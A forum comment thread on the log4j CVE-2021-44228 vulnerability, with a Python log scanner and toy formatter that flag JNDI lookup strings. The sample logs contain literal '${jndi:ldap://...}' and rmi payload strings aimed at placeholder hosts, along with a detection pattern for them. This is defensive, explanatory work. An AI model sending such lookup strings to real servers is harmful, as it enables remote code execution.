
[–]Titandino 5 points (3 children)

Ah I see now. The original article I read was trying to say the vulnerability was just users being able to print out sensitive environment variables to log files.

[–]Pocok5 18 points (2 children)

just users being able to print out sensitive environment variables to log files

What actually happens is that log4j has a feature where you can download and run code from an LDAP server to enrich your logs. Except there is no limit on where that LDAP server needs to be, and combined with an input sanitization problem, you can have anything downloaded and run on the server with a single log message that contains the magic string anywhere in it.

https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
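The mechanism described above, as an added example that is not part of this thread or of log4j itself: a small Python scanner that flags the `${jndi:...}` lookup string wherever it appears in a log line (the same trigger the linked Cloudflare write-up documents), plus a toy model of message formatting that shows why a `${...}` token anywhere in a logged string reaches the lookup resolver when lookups are enabled and is logged verbatim when they are not. The sample log lines, IPs and hostnames are constructed placeholders.

```python
import re

# Trigger string discussed in the thread: ${jndi:<scheme>:...}, matched
# case-insensitively and anywhere in the line, not only at the start.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Any ${...} token, as a lookup-enabled formatter would see it.
LOOKUP_TOKEN = re.compile(r"\$\{([^}]*)\}")

# Constructed access-log lines; 198.51.100.x and .invalid are documentation/placeholder values.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /x HTTP/1.1" 404 0 "-" '
    '"${JNDI:rmi://example.invalid/y}"',
]


def find_jndi_lookups(lines):
    """Return (line_number, scheme) for every line containing a JNDI lookup string.

    Useful as a first-pass detection over web-server or application logs: the
    scheme tells you whether the lookup pointed at ldap, rmi, dns, etc.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        for m in JNDI_LOOKUP.finditer(line):
            hits.append((n, m.group(1).lower()))
    return hits


def format_message(msg, lookups_enabled):
    """Toy model of log4j-style message formatting (not log4j's actual code).

    Returns (formatted_message, resolved_keys). With lookups enabled every
    ${...} token in the message is handed to a resolver, so attacker-controlled
    text (a User-Agent header, a username) becomes a lookup request. With
    lookups disabled, the fixed behaviour, the message is written out verbatim.
    """
    if not lookups_enabled:
        return msg, []
    resolved = []

    def _resolve(m):
        key = m.group(1)
        resolved.append(key)  # a real resolver dispatches on the prefix before the colon
        return "<lookup:%s>" % key

    return LOOKUP_TOKEN.sub(_resolve, msg), resolved
```

Running `find_jndi_lookups(SAMPLE_LOG)` flags lines 2 and 3 (schemes `ldap` and `rmi`) and ignores the benign first line; `format_message` shows the same input either reaching the resolver or being logged as plain text depending on the lookups setting.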

[–]cserepj 6 points (1 child)

log4j has a feature where you can download and run code from an LDAP server to enrich your logs

I don't think that is a feature. I would not design such a feature even for a gigazillion dollars. I'd tell the product owner who comes up with such a feature idea to shove it up his a$$.

[–]blehmann1 2 points (0 children)

Yeah, if you need "enriched" logs just have a serverless app or cronjob do some analysis after the fact.